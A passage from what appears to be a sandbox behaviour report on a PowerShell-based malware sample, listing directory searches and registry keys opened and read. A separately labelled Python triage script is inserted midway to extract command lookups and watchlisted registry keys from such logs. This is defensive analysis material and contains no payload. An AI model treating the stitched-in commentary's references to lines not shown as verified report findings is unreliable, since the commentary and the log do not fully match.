Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*


Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI

Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI

Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI

Searched a directory for the name:


C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI

Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI

Searched a directory for the name: C:\Windows\system32\attrib.COM

Searched a directory for the name: C:\Windows\system32\attrib.EXE

Searched a directory for the name: C:\Windows\system32\attrib.ps1

Searched a directory for the name: C:\Windows\system32\attrib.psd1

Searched a directory for the name: C:\Windows\system32\attrib.psm1

Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe

Registry Operations: 534

Registry Created

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default

Registry Opened

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server

HKCU\Control Panel\International

HKCU\Environment

HKCU\Software\Microsoft\.NETFramework

HKCU\Software\Microsoft\Fusion

HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKCU\Software\Microsoft\Installer\Assemblies\Global

HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKLM\SOFTWARE\Classes\Installer\Assemblies\Global

HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA

HKLM\SOFTWARE\Microsoft\Fusion

HKLM\SOFTWARE\Microsoft\PowerShell

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\Global

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN

HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance

HKLM\SYSTEM\CurrentControlSet\Services\EventLog

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell

HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell

HKLM\Software\Microsoft\.NETFramework

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000

HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet

HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet

HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy

HKLM\Software\Microsoft\Fusion

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\20fe3c1a\56aa3966

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e571dbb\41bddfc6

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a

HKLM\Software\Microsoft\PowerShell

HKLM\Software\Microsoft\PowerShell\1

HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine

HKLM\Software\Microsoft\StrongName

HKLM\Software\Microsoft\Windows NT\CurrentVersion

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe

HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500

HKLM\System\CurrentControlSet\Control\Session Manager\Environment

Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating
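The directory-search lines earlier in this section (attrib.COM, attrib.EXE, attrib.JS, attrib.ps1 and the bare name attrib, probed first in the Oracle javapath directory and then in system32) are the footprint of PowerShell command discovery: when a script calls a command by bare name, the host looks for that name with every PATHEXT extension plus its own .ps1/.psd1/.psm1 types in each PATH directory in order. A single lookup of one file, such as pd.bat under the Administrator's Documents folder, leaves a different pattern. The Python script below is an added example and not part of the McAfee report; it turns such listings into triage leads by recovering bare commands resolved this way, listing user-profile paths the process looked up, and surfacing registry keys from a small watchlist. The embedded sample log is constructed from a subset of the report's own lines; the watchlist contents and the three-extension threshold are assumptions chosen for the example.

```python
"""Triage helper for sandbox behaviour listings (added example, not ATD code)."""
import re
from collections import defaultdict

# Extensions PowerShell tries when resolving a bare command name through PATH:
# the default Windows PATHEXT set plus PowerShell's own script/module types.
PROBE_EXTS = {"COM", "EXE", "BAT", "CMD", "VBS", "VBE", "JS", "JSE",
              "WSF", "WSH", "MSC", "PS1", "PSD1", "PSM1"}

# Assumed watchlist: keys an analyst usually wants surfaced from a long
# "Registry Opened" list. Hits are triage leads, not verdicts.
REGISTRY_WATCHLIST = (
    "\\Image File Execution Options\\",
    "\\Policies\\",
    "\\Internet Settings\\Connections",
)

SEARCH_PREFIX = "Searched a directory for the name:"

# Constructed sample in the shape of the report's event lines (a small subset).
SAMPLE_LOG = r"""
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JS
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JSE
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.ps1
Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib
Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat
Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat\*
Searched a directory for the name: C:\Windows\system32\attrib.COM
Searched a directory for the name: C:\Windows\system32\attrib.EXE
Searched a directory for the name: C:\Windows\system32\attrib.ps1
Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe
Registry Operations: 534
Registry Opened
HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
"""


def parse_events(text):
    """Return a list of ('search', path) / ('registry', key) pairs; headers are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(SEARCH_PREFIX):
            events.append(("search", line[len(SEARCH_PREFIX):].strip()))
        elif re.match(r"^HK(LM|CU|CR|U|CC)\\", line):
            events.append(("registry", line))
    return events


def command_probes(events, min_exts=3):
    """Infer bare command names resolved through PATH.

    A directory where the same stem was probed with at least `min_exts`
    distinct PATHEXT/PowerShell extensions (the bare name counts as one)
    is treated as command discovery. Returns {command: [directories]}.
    """
    seen = defaultdict(set)  # (directory, stem) -> extensions probed there
    for kind, path in events:
        if kind != "search" or path.endswith("\\*"):
            continue  # '\*' entries are directory enumerations, not lookups
        directory, _, base = path.rpartition("\\")
        stem, dot, ext = base.rpartition(".")
        if dot and ext.upper() in PROBE_EXTS:
            seen[(directory, stem)].add(ext.upper())
        elif not dot:
            seen[(directory, base)].add("")  # bare-name lookup
    result = defaultdict(list)
    for (directory, stem), exts in seen.items():
        if len(exts) >= min_exts:
            result[stem].append(directory)
    return {stem: sorted(dirs) for stem, dirs in result.items()}


def user_profile_files(events):
    """Deduplicated paths under C:\\Users\\ that the process looked up."""
    found = []
    for kind, path in events:
        if kind != "search":
            continue
        clean = path[:-2] if path.endswith("\\*") else path
        if clean.lower().startswith("c:\\users\\") and clean not in found:
            found.append(clean)
    return found


def watched_registry_keys(events):
    """Registry keys matching the watchlist, in log order."""
    return [key for kind, key in events if kind == "registry"
            and any(w.lower() in key.lower() for w in REGISTRY_WATCHLIST)]


def triage(text):
    events = parse_events(text)
    return {
        "commands_resolved": command_probes(events),
        "user_profile_files": user_profile_files(events),
        "registry_of_interest": watched_registry_keys(events),
    }


if __name__ == "__main__":
    for section, hits in triage(SAMPLE_LOG).items():
        print(section, hits)
```

Run against the full report rather than the sample, the same three functions give a short list of bare commands the dropped script invoked, the files it staged under the user profile, and the handful of registry keys worth reading in detail; the probe threshold keeps ordinary single-file lookups such as powershell_ise.exe out of the command list.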

Registry Read

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Default

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server Default
HKCU\Control Panel\International sYearMonth

HKCU\Environment PSMODULEPATH

HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks

HKLM\SOFTWARE\Microsoft\PowerShell\1

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine ConsoleHostAssemblyName

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine PowerShellVersion

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine RuntimeVersion

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds PipelineMaxStackSizeMB

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell path

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN StackVersion

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance First Counter

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance IsMultiInstance

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance Library

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance CategoryOptions

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance Counter Names

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance FileMappingSize

HKLM\Software\Microsoft\.NETFramework DisableConfigCache

HKLM\Software\Microsoft\.NETFramework InstallRoot

HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR

HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue

HKLM\Software\Microsoft\Fusion CacheLocation

HKLM\Software\Microsoft\Fusion DisableMSIPeek

HKLM\Software\Microsoft\Fusion DownloadCacheQuotaInKB

HKLM\Software\Microsoft\Fusion EnableLog

HKLM\Software\Microsoft\Fusion ForceLog

HKLM\Software\Microsoft\Fusion LogFailures

HKLM\Software\Microsoft\Fusion LogResourceBinds

HKLM\Software\Microsoft\Fusion LoggingLevel

HKLM\Software\Microsoft\Fusion NoClientChecks

HKLM\Software\Microsoft\Fusion UseLegacyIdentityFormat

HKLM\Software\Microsoft\Fusion VersioningLog

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Core,3.5.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Transactions,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Xml,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default mscorlib,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 LatestIndex

